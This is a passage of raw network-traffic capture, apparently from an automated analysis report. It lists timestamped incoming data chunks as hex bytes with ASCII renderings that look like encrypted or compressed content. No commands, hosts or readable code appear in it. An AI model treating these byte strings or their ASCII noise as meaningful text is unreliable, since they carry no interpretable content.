e7 21 b7 f8 33 f9 49 a3 48 ee d8 83 71 22 4a 96 1f ca a0 4e b2 15 fb e2 6c d9 d8 ab 1a 6e 94 50 07 54 e0 b0 f5 6d c9 f1 ee 62 cd 52 64 99 de eb f3 47 d0 64 d9 b2 10 e7 07 Data Ascii: -Ph:G6$'U88)!G#CA.I[9`['{h!oZT[ O(,/<=~Y}@RpwoU\|X(YlTjCHI{?l}fJe"0]!3IHq"JNlnPTmbRdGd
2022-11-07 22:49:09 UTC	9961	IN	Data Raw: a2 50 63 d4 ab 5c ff 7c 26 bd 83 67 6c b1 be ee 76 1e 7f cf 7f 06 da 82 9d 76 d4 6f 7f 6e 5e 52 f2 56 dd b9 0e e6 36 03 a6 af 36 c0 1f 25 ca a6 68 00 fb f9 75 72 b4 d6 60 8b ba 01 d2 eb 86 52 80 2e 1d 66 b7 65 71 61 ba 40 cd 64 43 3d f4 c6 4d e1 75 e5 c9 6f 39 3f 73 21 10 0f b1 54 79 2a e9 1a c6 66 8e dd 48 2d fc 66 58 0c 9f e8 bd d4 6d d0 d7 22 9f 4b ee 48 3a 20 d1 1e a4 6d 3a 81 af a8 67 94 63 79 ae c3 e3 b7 42 22 8c 38 2c 6d 72 69 18 ba 20 a4 68 f4 ca b4 cc 87 18 0a fe 67 98 97 cd 2d be 8f 71 cf 61 54 ea 13 08 f8 d3 c5 fd c6 22 8f d2 64 64 47 b6 bb 14 af 74 01 43 51 b1 ee 46 22 a4 76 f3 b4 5a f5 97 96 0b 4b 24 a3 f3 b2 55 15 3c ec 5d 2e 75 83 d6 74 64 f0 a8 93 da 75 56 61 08 76 e0 55 5b a8 05 7c 47 e4 e7 24 52 6d 69 05 3b 09 9f 51 36 49 26 c7 e7 03 f4 Data Ascii: Pc\\|&glvvon^RV66%hur`R.feqa@dC=Muo9?s!Ty*fH-fXm"KH: m:gcyB"8,mri hg-qaT"ddGtCQF"vZK$U<].utduVavU[\|G$Rmi;Q6I&
2022-11-07 22:49:09 UTC	9977	IN	Data Raw: 10 b6 5d ff 43 91 f0 19 40 79 79 73 24 fd 88 11 dc a8 60 cb c8 25 f2 9c d2 c5 5d b9 15 10 b5 c1 b3 57 6b 16 65 b4 31 3a 2c 55 32 63 74 01 e1 8c b0 b1 e8 f2 9a a9 a5 37 dd c8 97 05 4d 9f 32 2d 60 25 2c 08 0d d6 5e 97 1d 3c 25 02 4a c3 6d 15 70 87 cf 20 c7 ea 9e 4f f0 5a 36 8c 94 18 a0 bb 61 3f ea 3f b4 60 a8 8b 68 99 b4 9f 25 f3 dd f8 73 51 7e 23 ff 5d d1 8b 33 b9 3a 71 c5 e4 6c fa db a5 24 c0 de 59 ba ac 04 41 b1 39 cc 80 ef 70 fe 27 7d a7 a7 b2 85 f8 81 68 28 01 13 42 f1 bd fb 9c e3 b5 07 7d c4 bc cb 31 e8 fa b3 8d 8e c1 7c b7 9a 02 02 55 a1 da c7 70 56 b2 71 1d 8f 45 5f 48 d9 49 ea 5b c5 68 f3 17 4f 2a 67 65 e7 c1 1d eb 11 3d 93 f9 e3 4a cf 2b bd 87 b5 e0 14 20 b2 a3 dc 90 4b 1b 21 08 69 06 c6 8c ff dd 4b 6f da 88 7d 65 1d 58 4b 48 38 a4 91 47 0e 69 0f Data Ascii: ]C@yys$`%]Wke1:,U2ct7M2-`%,^<%Jmp OZ6a??`h%sQ~#]3:ql$YA9p'}h(B}1\|UpVqE_HI[hO*ge=J+ K!iKo}eXKH8Gi
2022-11-07 22:49:09 UTC	9993	IN	Data Raw: 07 79 9e f9 ac 0d 5d 91 58 ee be 34 6e 99 81 ba 9f 82 6f 77 63 dc bd 80 27 9b f6 04 90 c9 63 44 e3 f7 be 51 ea 9d 15 30 69 08 b6 81 fd 22 f8 3f 0f e5 81 58 bf 2d ff 9e 24 65 91 e7 d4 5a 33 ae cd d0 5f fa 44 ff 62 ba 6e 08 d6 1e df 21 73 7e e5 79 34 2c 81 85 79 32 36 20 fa 53 a3 b1 03 78 fc 7f 80 83 3f bd d1 f9 3a 4a cb 5c 14 68 c2 33 7f 9b ab 80 19 00 19 ca 04 d3 85 e8 09 2e 7e 1b 96 39 b5 1e cd 95 66 4f 9b f6 0a 8f 13 79 7e dc ee d2 f5 20 92 cb a8 53 7c 04 14 d1 f1 43 3e a9 bb 05 2e 1e eb c4 06 1a 99 81 7f 4a 5f 0b c9 cb c6 6c 33 8b af fa 5d f6 5b 82 64 bc 79 b7 d1 1a ba 7f 7b e7 ee 65 e1 4a ea 55 b6 0d df c1 b5 d6 cb 6c 28 61 4c 42 95 e5 58 e3 f3 c2 cc 66 70 05 3b 98 f6 70 e4 b4 e6 95 94 46 3e c0 5e c7 7f 12 f1 8f c8 9c d4 aa 16 15 72 c9 75 1f 43 34 47 Data Ascii: y]X4nowc'cDQ0i"?X-$eZ3_Dbn!s~y4,y26 Sx?:J\h3.~9fOy~ S\|C>.J_l3][dy{eJUl(aLBXfp;pF>^ruC4G
2022-11-07 22:49:09 UTC	10009	IN	Data Raw: c1 1e ef 0e 09 4c e5 87 79 ee 9f 19 cc 71 c9 4c b0 bb 21 58 d1 52 b4 85 d1 1d e3 f2 8c 99 18 e8 60 7f e0 41 34 27 0a 7d 37 07 2a 19 3b a4 12 9d 9f 7e 40 6b b2 5d 71 86 b2 6c 60 eb 59 6e bf 8f fd f1 a7 cc d2 9e c1 5c 8c 21 84 35 3a c4 fb 26 e8 39 6e ea 8e 8b 2b b8 ea 1d d0 c5 5a ac 9f 19 da a3 35 0b 64 93 9b 4e 3c 50 2d 6d b8 e5 3a f2 c7 38 c1 9e f0 6b b8 bf d4 2b 4d 1f fa e5 d5 b6 d5 1f 1d 78 19 0e 3b ab a0 66 73 00 a0 d9 9e 69 d4 2e 5f c8 d4 4d 25 3e 86 53 fc 3f c8 9f b4 e3 4c be 89 ef f6 43 31 24 b7 8f 0e 46 88 33 02 c1 33 b7 04 1c 08 cb 00 3b e5 3b 79 81 a7 09 b6 7b fc 03 aa c6 62 d7 f7 ca c9 32 6b d8 ad c3 b6 bd 87 9b fb 11 58 27 df d0 32 b8 44 78 b8 13 07 41 1d dc 68 c2 16 04 e5 21 f7 bc 0c 95 7e 2d 18 f7 61 3a 44 a4 16 0e 85 95 e4 58 70 45 55 b0 2c Data Ascii: LyqL!XR`A4'}7*;~@k]ql`Yn\!5:&9n+Z5dN<P-m:8k+Mx;fsi._M%>S?LC1$F33;;y{b2kX'2DxAh!~-a:DXpEU,
2022-11-07 22:49:09 UTC	10025	IN	Data Raw: 3b 10 59 17 15 96 44 4a fe 06 c9 e4 3a b4 11 5f a8 73 c5 27 57 90 37 43 99 77 41 fc 4c 5a 41 d0 66 be fb 06 22 e2 b2 8b c6 5d 8f 8e 00 7d 55 80 76 e3 56 78 71 b1 4d 7b 71 b7 0b cb 26 a4 17 33 90 d6 6a e9 ba 4d e5 20 b8 bc 23 a2 77 1d 3f c3 ea 3a fa 89 6e be 6f 44 fe 25 e2 71 63 89 e6 7a a1 f0 c5 97 39 7f 66 59 6c 45 2f be e2 5f a4 1e cf 9e 00 2f f8 bf 07 da 44 a3 b2 cc 37 b3 65 b3 4a 38 33 39 b2 85 e6 6e 2a 60 ad 12 36 38 77 fe f5 e4 e6 60 a0 3a 9d 57 62 a8 37 aa 98 aa 9b 03 8a 72 05 a3 e5 ee 4d a7 07 58 ef 5e 39 74 c7 f9 e2 d0 6e 83 64 b0 a2 73 13 0d 87 31 fa 49 42 4c 4f 64 bc fd 74 e3 c4 67 a9 a5 dd 91 d6 4d 74 db cd c0 6d 27 05 cd 1f cb 42 c5 ed a8 96 2f cc 64 82 1e 8f 85 7e 5b 8e e3 dc 00 2a 66 ba 18 a2 b7 5a a0 94 17 33 1f 25 0f bf 01 61 c9 8c 04 e6 Data Ascii: ;YDJ:_s'W7CwALZAf"]}UvVxqM{q&3jM #w?:noD%qcz9fYlE/_/D7eJ839n`68w`:Wb7rMX^9tnds1IBLOdtgMtm'B/d~[fZ3%a
2022-11-07 22:49:09 UTC	10041	IN	Data Raw: 46 a5 a6 0f b0 a4 55 64 3c fc 8c 66 a3 bb ee 34 cd 02 9c 4f de bc f1 45 ad 16 ea b7 52 cf 97 3b b3 b6 46 43 3b db bc 4e 50 ea e4 18 31 82 b7 55 1a 9e 8e 02 da d5 07 23 89 4e 0d 73 12 45 fb c5 0b 47 e4 82 ce 48 ee 18 85 be e4 7c e9 34 81 f6 d5 e2 3f bb 93 71 63 e6 23 52 57 82 1f bc 79 b3 f1 76 f1 a6 6e 84 51 18 aa 34 6b 09 b4 47 63 35 3f d5 3d 12 53 60 95 da 5a c5 7d b5 4d 15 b6 e2 a3 0a 15 3a 5e 60 56 e7 a1 fe 96 ac 7b 09 70 dd 14 d4 85 ac bd 3f 38 6e a5 49 92 fe 36 b6 24 38 1a 80 cf ca d5 df 9e 05 fb 6a af 5e b0 c7 fd d8 cc 88 8d 0c d9 89 f7 a1 e0 ff 33 37 5d cf 1e c7 b3 fd b6 c6 29 49 c0 c1 4c 84 19 5b 36 01 ca f8 03 62 d9 5d 1f 73 64 ca 39 3b ed 3e a4 bf 54 bd 39 2d 14 e1 4c 8a b2 4a 79 26 cf ba 13 94 6a 48 f2 88 98 5b 10 a4 e5 46 72 9f 0d 87 e6 03 68 Data Ascii: FUd<f4OER;FC;NP1U#NsEGH\|4?qc#RWyvnQ4kGc5?=S`Z}M:^`V{p?8nI6$8j^37])IL[6b]sd9;>T9-LJy&jH[Frh
2022-11-07 22:49:09 UTC	10057	IN	Data Raw: 12 ff ac 42 2a d6 2b 41 c4 60 a9 60 ea 5e bf 68 8a e9 1a 5a 43 1e b9 c1 41 a8 06 69 74 b6 ea bd 26 a3 eb 0f e9 13 a5 51 b0 30 92 ff ce a1 69 85 ea db 74 c7 2f 49 0d 26 b2 83 a1 ae 88 a4 e7 03 cf b2 6e e4 16 c5 8f a3 78 60 0f bd 1d 69 7d 08 86 53 b6 9a 0e 88 34 b1 03 64 a8 5f 6d 09 8e 98 90 0a 7f 0d 20 67 00 19 15 cb f7 59 30 b1 0b 94 50 6a 0b e9 40 e9 e9 7f 1d ac 2f 95 4d ef a1 1e d9 de 3a d6 21 e9 9a 8f b1 5d a7 40 22 e2 45 b4 7c 76 90 7d ee 04 e7 bb 78 25 d6 1b de b2 47 3e 1d a1 c8 ae 6e 57 2a 17 66 21 c7 e9 85 ba 65 40 f0 e5 2f 3f 1d 76 67 cc 8c 59 c5 cb 5f 86 84 0d 86 ac 37 eb 17 1e e8 6e c6 e3 cd dc 26 05 6a 63 46 77 91 9e 36 40 ea 88 06 ef 86 99 3e 23 09 19 33 34 2f 93 33 d4 f8 3e 7c 25 e6 fc 7d ec d2 f4 d4 c3 d8 f1 4a f6 0c ef 76 99 5e 71 77 bd b5 Data Ascii: B+A``^hZCAit&Q0it/I&nx`i}S4d_m gY0Pj@/M:!]@"E\|v}x%G>nWf!e@/?vgY_7n&jcFw6@>#34/3>\|%}Jv^qw
2022-11-07 22:49:09 UTC	10073	IN	Data Raw: b4 4b b8 95 51 bb 79 1c a7 d3 88 de fd 54 d2 1a 31 ce a5 68 a9 f4 ea ea f9 85 73 fb 8d 8e 0c 4f be 5f 3b 00 bb 6a 19 65 c5 2f 7f da 77 ab 1d 5d 4f f3 3a 6b 41 fd 1c db 16 c6 9d 0f b3 c2 5f 49 0c b0 37 7e 9e a1 52 34 ee e6 09 2e 17 15 f1 f7 f4 98 a1 94 cc 59 04 81 47 25 c2 e6 e4 6c 14 e1 5a 6c 9f 74 3c 1c 0b d4 48 df ab 8b 6f bc 1a 74 bb 89 be 16 f4 77 a1 18 09 1e f4 2f 9d d5 ff 92 1d 95 1e 67 bc 13 d1 3d c0 cf 8c ed c1 17 be b5 53 05 58 9b 77 cf 3f 92 f9 fb 1e 4b 6a ac 34 fb 00 83 5f 4b 8b 5a eb a2 32 e8 64 1f fd 67 a3 0a b8 c8 ba a5 9c 0e 0d c0 d7 1c 18 89 c9 03 43 36 17 c2 4e 4e 7f 2a 8b f1 c5 0e 13 93 0d a5 24 0e 5a ae 5b 8d a5 81 f8 5c 58 8e 85 65 18 fa 06 e3 f8 9b 6d 09 8b 24 77 3d 04 fd f5 a0 d0 b8 3d 19 d4 f9 72 21 96 8e 8c ea 16 ea c4 45 b6 d7 6d Data Ascii: KQyT1hsO_;je/w]O:kA_I7~R4.YG%lZlt<Hotw/g=SXw?Kj4_KZ2dgC6NN*$Z[\Xem$w==r!Em
2022-11-07 22:49:09 UTC	10089	IN	Data Raw: d2 db 84 d4 7c 1c 84 c6 ba 89 7b f0 cf 98 25 3e fa 16 87 5f 4b 67 c9 78 ea c0 bd 9e b0 85 35 41 cd d8 64 de 67 ad 4c 03 24 ed f5 4c 59 04 d5 63 98 4d d7 84 40 f9 70 01 b8 08 c0 a9 3d 99 6b 7e 79 3b 84 93 fa f6 cf 77 ef c6 5b 63 40 90 38 02 e3 3a e7 0b 9f 9c 4c 50 27 d3 c6 60 77 d2 e2 68 6e 2d 9a a1 ca fc 9e 27 3b 50 b9 54 ce 26 a4 3e 93 ad 7f be a9 5a 1f d9 24 50 7e b1 a3 a5 7d 35 6e 93 5a 7a 57 23 06 0c 3f 6e 93 83 ea f2 bd 77 42 72 48 ea c8 9d fe a9 86 44 6d e3 4c 39 d1 da 0e 64 df 49 00 9f a8 50 73 1d d7 3f 0b 23 1f dd 95 75 88 3d 47 cd 9b 11 fd 18 c9 f0 11 b5 46 e4 fc 7b 75 af 0d e2 4c 06 6e 9e 97 18 af 7e e0 b7 f6 8c c4 07 04 e9 80 ba dc e1 5e 3b 26 f2 6e 01 d3 a0 aa c7 0a 74 dc 6e d1 7c 01 4d 1e d7 f0 81 67 bd 65 e6 49 01 f7 df 36 da c6 e0 dd 8d ef Data Ascii: \|{%>_Kgx5AdgL$LYcM@p=k~y;w[c@8:LP'`whn-';PT&>Z$P~}5nZzW#?nwBrHDmL9dIPs?#u=GF{uLn~^;&ntn\|MgeI6
2022-11-07 22:49:09 UTC	10105	IN	Data Raw: c2 f0 56 ed 1b 00 e3 77 fd 66 d5 6a cd ec 6a 1c d5 e5 e4 fa 93 2b 2d 41 07 ec e6 28 c1 3e c4 57 b3 bc 6f 3f e7 61 cd 0a 93 9f fd 92 e7 36 3a e0 b5 d1 30 02 29 0c 74 60 f6 14 76 b8 12 2c c2 ee ce 2c 4b 1c 08 5c 79 30 30 4f 67 84 16 cb b4 2a d5 24 02 8d ff c6 a9 89 a4 2d af dc c8 19 8e c5 24 cf 4c fa aa 1d d3 ed 3d 9f 46 43 eb 97 b4 50 93 28 91 58 b1 04 e4 7b a2 93 45 fb ad dd 6e 51 3a 95 77 bc 7c f8 24 e4 00 d4 81 67 8e 8b 4b 5a 04 57 33 30 54 62 4f b4 c8 d5 92 7a 00 17 de aa f1 07 19 ef 27 88 ca 8c 59 9f e1 02 15 eb 3f 0e df 5f 13 87 ef b1 f7 18 74 30 90 37 0c e4 f0 b2 3d f7 61 30 0b 4f 3b ae f3 1e cd 3d 3a 36 5d 1a 83 46 4e 0b 9d fc 39 c8 d6 34 81 5e 87 83 51 7a be 6b 53 f4 be 31 89 fa 94 e3 cb 56 a5 37 74 56 52 ed 96 f7 39 2a b1 37 ea da 61 a8 3f ba 52 Data Ascii: Vwfjj+-A(>Wo?a6:0)t`v,,K\y00Og$-$L=FCP(X{EnQ:w\|$gKZW30TbOz'Y?_t07=a0O;=:6]FN94^QzkS1V7tVR97a?R
2022-11-07 22:49:09 UTC	10121	IN	Data Raw: bd f2 64 a2 a5 37 9a 2e 3d 32 d4 fd 36 b0 81 a4 e3 a5 60 48 a4 f9 3f 78 1d 03 6d 75 90 7e e1 74 7b 66 08 12 f8 5e b2 ff 1b e0 21 77 c7 fc 7d 29 5c b3 8b 88 77 0f c3 60 4c fd 0e 30 bc c4 8f 58 30 b2 6e 83 45 e8 5c 2d 95 86 58 f2 35 91 00 f6 05 a1 dc 43 62 a8 f6 36 7f c1 67 ea d0 7b d0 31 fb fe a5 fc c2 f9 cd b5 07 cf 82 f5 32 5b ce 9b 91 6e f2 f4 a6 50 d4 b2 7e fa fe 52 3e b7 3e a5 5c a5 7e f5 49 8a d9 45 57 ab a3 d4 73 8c b0 53 bb ba 01 ac f0 68 4b 9a 65 a6 87 67 ba 4d e2 12 63 0b d9 2e ff 3b aa dc 3f cf 25 24 0b ee b1 2d cd dc df 7b e7 27 73 07 90 72 57 b1 1f 86 56 0b 46 e7 da f6 f3 32 85 ac 08 07 86 40 1f 16 e7 7f 52 39 10 6b 01 08 2f 66 ce ce 08 d4 a6 c7 af 85 14 ca e9 c3 99 2c 2a 70 84 61 b9 f8 ed f8 ad 31 b4 1d fa 96 38 2b 0b 65 b2 c1 5a 4f 67 41 d4 Data Ascii: d7.=26`H?xmu~t{f^!w})\w`L0X0nE\-X5Cb6g{12[nP~R>>\~IEWsShKegMc.;?%$-{'srWVF2@R9k/f,*pa18+eZOgA
2022-11-07 22:49:09 UTC	10137	IN	Data Raw: 31 5b 15 29 95 4c 79 30 f2 dd 53 17 2a cf fe 9d e2 d8 66 a3 f5 be 83 51 0d 13 25 5a 79 7b 25 c0 26 a1 7d 6c 99 bb a8 67 59 74 14 37 90 6b 2c 9b 6e 91 4b 6f a5 d6 c0 e4 65 9e 7e 7a cb 05 4d ac f0 62 e2 8a 89 e7 be 15 48 68 8c ab 47 25 9c c7 52 29 d6 17 de 45 2d 59 6b f2 b3 48 b6 4c c4 b7 20 a4 71 e9 e3 47 bc 18 23 3b 4b 69 06 64 91 a9 e8 e4 0a 89 27 e6 3e 27 5a 0c 0b 6c cf cf 35 af 0d 70 82 5f 54 ed a3 78 90 e5 3a 5c 69 1e 5d f6 0f a4 8c 30 ec 94 ae f5 b3 78 39 a2 63 58 88 0a 03 0b 33 8e 99 0f 04 c3 e1 b8 d7 27 ed 38 88 39 ca 4c e3 a3 c5 af 4c 8e 2a 4c 3c 4b a1 3d d0 70 19 e1 3b 5d 7a ca 70 a5 e7 7a c9 e4 39 fa a5 0d f9 17 34 0d 8f 40 43 2b 65 fb 13 b3 22 41 40 f2 71 91 c2 94 14 c5 5d 3f bd 26 5a 58 61 5e 61 af 47 d3 13 b4 ce 9f 96 61 12 e4 c6 08 bc 35 ed Data Ascii: 1[)Ly0SfQ%Zy{%&}lgYt7k,nKoe~zMbHhG%R)E-YkHL qG#;Kid'>'Zl5p_Tx:\i]0x9cX3'89LLL<K=p;]zpz94@C+e"A@q]?&ZXa^aGa5
2022-11-07 22:49:09 UTC	10153	IN	Data Raw: b1 9a e0 e2 a9 6c 9c b9 c5 6a f0 07 97 f7 4b 4c 52 e9 d3 28 b2 aa 7f 44 b2 ec 3d 8c c9 ba d8 b1 0a 1c a1 88 23 de ab 70 53 94 59 4c 95 cc 9d 29 44 76 4e 25 d9 7c 10 69 df 1d 55 ab 07 a8 ce db 60 62 b2 d3 38 54 9d f3 3b cd 4c 59 82 1a 2a 6b 3d f4 57 7d f4 91 f7 fb e9 42 28 1f 6d e2 96 be d2 d6 2e 07 e8 d9 10 fc bc 72 47 30 70 01 c3 01 45 ae cc 79 4a 47 1a 15 0a 55 b8 d3 f6 d4 cd 80 84 41 27 24 b2 1a 6a e9 fe cf f7 b9 a1 fc 0d 80 50 e2 b9 3b 73 7e 94 95 00 7c 53 e9 01 b9 74 fb c7 7d c5 1e 17 d2 1c ae 8c cd de 38 d6 c4 d1 f5 0b e0 ac e3 a1 3d 16 fc 6a 27 fb 23 03 67 64 49 d1 1e 18 2f 38 39 d7 c2 bd 47 89 65 d3 13 b4 bc b9 35 0a 4f 90 a7 83 87 0f 01 5e 1c 4f 2f 71 fe a2 ac 5c 58 81 00 0d c5 60 ac 0b 61 ae 7a 9c a6 2c 2d 4f 7c ba 7d b4 fc 8e 0e 71 da 0b 52 53 Data Ascii: ljKLR(D=#pSYL)DvN%\|iU`b8T;LY*k=W}B(m.rG0pEyJGUA'$jP;s~\|St}8=j'#gdI/89Ge5O^O/q\X`az,-O\|}qRS
2022-11-07 22:49:09 UTC	10169	IN	Data Raw: 5e b5 53 67 0a a0 d9 b2 6a 19 9d bc 70 56 08 e7 c5 3d 3c 4d d7 52 44 92 52 e6 a1 de 1a dc 4a fb 39 ff c2 0a a1 0c b1 55 81 f1 58 7d 25 7b 7a 91 58 33 3b 0e aa ff dd f2 72 62 f5 6f c5 22 b0 e7 f0 06 cc c9 87 e5 44 c5 2e 6b a0 af cb 17 36 12 2e bd 97 45 f8 1e 66 b8 5b 44 58 3e 50 a8 a1 55 fe 89 17 f4 e0 f3 f6 b6 91 52 1c 1b b2 14 46 42 df 3d cc a5 dc ce cd 34 77 9d b0 86 08 df b0 eb 08 f2 aa cd 2b 0f fb 84 23 2e c7 c9 55 10 b3 d7 b4 e2 09 98 66 02 9e c9 8f 3f 90 61 81 cd 08 3f ac 49 cc 2b 20 ad a7 6c a2 ac c0 37 a5 dd d5 94 3e 62 bd 63 4f f8 0a 14 06 00 e9 b2 46 72 2e 75 22 16 25 3e d2 eb d0 57 d3 af d8 2e 88 c6 dc 85 3b 03 bc 85 ea c3 69 e7 2e f5 b8 30 3a a6 86 ef 2c d0 43 33 e2 55 4b 83 6c 76 0f da 85 f3 4c 6f b7 29 2c d0 f6 c5 ae 53 32 76 a4 b6 3f 88 d3 Data Ascii: ^SgjpV=<MRDRJ9UX}%{zX3;rbo"D.k6.Ef[DX>PURFB=4w+#.Uf?a?I+ l7>bcOFr.u"%>W.;i.0:,C3UKlvLo),S2v?
2022-11-07 22:49:09 UTC	10185	IN	Data Raw: b0 39 a9 92 90 8d 0a f9 21 f4 e6 d8 6b c2 fe 1b b9 26 0c 06 c5 56 9d 2d 5b a6 ee 5e a7 cd bf 4c 06 7a 72 d8 4e b8 bb 61 5c b5 9e fb ca 8c 48 d5 f3 ff 19 4a 49 21 e2 dc cd 3d 8f 5a 51 fb 7b d0 c5 30 7a b4 11 05 65 e3 eb 57 fe 5f ee 00 dd 9d a3 23 52 96 b5 61 82 05 04 f9 7d 4d 1c 9a ac 17 67 eb c9 29 6a 96 76 79 ee 61 58 90 8c be ec 8d 0c 7f 6c 28 0f eb d6 1b b5 e0 33 79 e2 4e e6 65 f6 62 0b 5f b6 f2 c6 30 2c 3a bb b1 ef 97 d2 16 9a 3e c7 d0 8f c4 24 ad f1 6e 88 79 72 00 60 96 e3 9a 24 b5 e2 2e cf 1f ff 01 e4 d6 a2 af 12 15 87 42 89 76 bd 7a db 60 f3 7d ff df db eb 25 ed 99 36 f6 34 46 15 fb 06 26 28 3f 80 03 c9 04 06 52 4d 23 80 22 56 1c 8d 31 44 4c 5b 90 33 03 93 cf 02 2e da bd d7 44 db bd b4 3e 41 bf 29 70 ab 87 a1 98 e7 b2 91 3b 52 52 0a 0c 8b 2c 93 29 Data Ascii: 9!k&V-[^LzrNa\HJI!=ZQ{0zeW_#Ra}Mg)jvyaXl(3yNeb_0,:>$nyr`$.Bvz`}%64F&(?RM#"V1DL[3.D>A)p;RR,)
2022-11-07 22:49:09 UTC	10201	IN	Data Raw: af 64 2d 39 dd 57 ce 31 84 90 42 54 bf 69 fe b4 84 be fc 80 24 95 32 40 c6 86 07 75 35 41 f8 f9 ea 0b 89 ec 0d 1e b3 f8 bd 55 24 12 ea 0f 62 fb ab 86 82 93 e7 84 9d 31 01 45 39 36 27 f6 fd 44 71 cc 1b ac 65 c1 43 17 46 42 42 c3 58 3e 85 e5 8a 65 ad 0b 9f c2 99 c6 b2 f2 72 04 61 5d a8 ae 28 eb 25 6b 00 c8 28 6d 30 f5 1d 3e 44 29 ae 0a 15 98 ec e2 31 cb 2d 84 d0 e6 21 dc 3d 92 ce 2d 47 9e cd 9b 83 95 cd 85 cf 98 4a 9e d9 4e 54 6c 0a 18 21 15 a5 f7 f4 1b 78 9e a8 c9 38 14 d0 36 c9 22 da da ad e0 03 cd 10 64 d2 bc 30 66 af 62 5b 58 57 42 d9 1f 02 f0 52 a1 31 74 2c be 17 7b c0 12 83 fd 3d 25 ea 48 c9 58 44 26 c3 e1 ba e0 75 1b 0d b5 6d b7 85 e2 8b 96 ce d1 40 6f b4 8e 3b f2 b2 db e5 4b 82 52 e3 16 ae 52 3c c3 dc 2e 6c b1 c2 59 66 41 38 cd 20 62 a6 20 5e 26 cd Data Ascii: d-9W1BTi$2@u5AU$b1E96'DqeCFBBX>era](%k(m0>D)1-!=-GJNTl!x86"d0fb[XWBR1t,{=%HXD&um@o;KRR<.lYfA8 b ^&
2022-11-07 22:49:09 UTC	10217	IN	Data Raw: e1 0f 33 2d c9 3a c2 2c 9c a1 84 ff 2d 96 72 b8 e3 b2 57 7d ca 55 ef 41 19 ef db 81 98 12 fa d4 88 e5 98 10 6c 7f fb c3 76 30 61 c1 4e 4a 70 69 0c c6 f7 94 48 af 09 57 6f 1d 86 2c 5e be d3 b1 d2 3b 4d c6 af 72 b9 55 08 7c 44 c7 a4 14 e3 38 a9 c8 e2 2f 8a 72 3d c6 ca 92 09 23 d4 39 59 28 61 70 b5 c3 85 e7 bc 64 a1 db 59 5a 6d 07 07 d2 e8 f0 b5 96 61 f7 a2 fc 8c bb 0c 5d bf 35 71 d7 25 b0 81 b0 a7 f8 2a ff 08 73 70 45 b3 94 c0 a3 02 b9 4f 63 b1 ba 24 72 cf 28 cb f1 36 72 01 cf 32 02 06 3c 63 d7 54 d1 e7 ea 69 e6 70 41 e5 1d 24 a6 e3 a4 8b ff 75 da 8e f5 91 bb 58 0d fe b9 4d 65 7e 81 fd e2 6d 5b 5a c4 74 72 f2 26 2c 38 ff 24 e9 48 45 6f 02 8d ef de 03 07 99 d1 36 25 64 47 a8 81 a3 2d 26 a6 d4 a5 1c 6c 02 a2 3d 1a 7a 82 b7 63 48 48 4a 5f ca 92 14 30 05 4b 01 Data Ascii: 3-:,-rW}UAlv0aNJpiHWo,^;MrU\|D8/r=#9Y(apdYZma]5q%*spEOc$r(6r2<cTipA$uXMe~m[Ztr&,8$HEo6%dG-&l=zcHHJ_0K
2022-11-07 22:49:09 UTC	10233	IN	Data Raw: 4d af 8e 10 a9 78 35 fd cf c2 8d 8a 5d b6 cd 9e 0c 82 f5 37 8f 75 da ca f0 5d 44 ed 12 74 ff f8 da ba de 9d 0d a0 0c 9b 4d 60 e9 ef 33 49 40 15 55 1a cf c7 15 8d 17 4d d8 5b 5d 31 43 24 d5 6f 51 f2 00 cc 06 21 e4 51 a6 4f b7 00 2a 77 aa b8 9a 1a 5b a7 ae ea 1e 40 9f dc 32 09 98 84 21 cd 75 ac 60 db bc e5 c5 85 35 d3 e5 f2 78 d8 ee 07 fc 86 18 9d ca 48 39 2a ed 4e 60 5a c2 24 8a ba fa ab 9a 85 68 11 21 df 5c fc 53 35 d9 df ab ce 23 40 f7 ab bd 41 c5 0e 36 49 44 db 11 77 41 1f 04 1a 1f 5a f5 c0 a0 d4 55 4a c1 89 69 38 68 aa 25 6a 68 c3 d1 04 48 23 25 5a 96 05 cc 6a ec 6c b4 f8 50 de 98 5f 08 2d 9e 43 dd 82 ef 57 0c 39 ae 39 67 ea 92 c7 11 d1 83 c4 e6 34 3c be 7f 9e fc 06 a5 ce ae e5 e4 09 35 bd 01 36 a8 79 ef e8 2b 41 00 41 bf 30 14 a2 3f 0f e8 35 f1 de 2b Data Ascii: Mx5]7u]DtM`3I@UM[]1C$oQ!QOw[@2!u`5xH9N`Z$h!\S5#@A6IDwAZUJi8h%jhH#%ZjlP_-CW99g4<56y+AA0?5+
2022-11-07 22:49:09 UTC	10249	IN	Data Raw: 3f d6 65 75 a3 76 ac bc 4d 86 25 92 7c 4e 7a 44 84 15 75 db de 73 bf 3d 9f 58 f4 78 3f 88 1d 2e 20 fe 50 dc 35 5c d2 3d ea 61 f2 70 c5 a3 40 28 73 15 bf a3 c9 e3 51 3a 99 48 a1 1a 8b c2 9d 43 cc 2d 9b da 41 2b 29 6a 87 e8 4e f2 c4 40 76 84 a1 ef 6e 84 93 d2 7f c7 d5 ef e2 d6 f4 e8 e3 b6 dd 5c c7 57 e2 ee ab cf 62 11 18 2b ca 2b a8 b0 9e ea de ba 11 8f 97 4c c4 8d ad 67 f1 4f 8b 8f 0f 82 79 7f b1 16 ae a0 97 28 8f 1a e1 43 81 f1 5a a7 57 f7 cb 64 60 fd a2 89 27 c3 95 07 a5 e8 2e 1b 0e 56 1a 39 24 2b 3d e6 07 6f 24 f9 7d 63 0b 8e 17 2d ef 9a 0d 3d 54 71 0f e5 8b 90 b2 a6 e9 63 c5 e1 be fa 66 4d f3 cd a7 30 62 c7 c6 f3 ec 2e 27 ad 03 f5 ee 17 64 2b ef 39 1b 68 f8 84 bf d4 1b 5a 66 2f bc cf b9 4f 60 6e e4 7b 4e cf a0 28 18 8f 9d 15 b1 c0 af 24 8e ca 64 fe be Data Ascii: ?euvM%\|NzDus=Xx?. P5\=ap@(sQ:HC-A+)jN@vn\Wb++LgOy(CZWd`'.V9$+=o$}c-=TqcfM0b.'d+9hZf/O`n{N($d
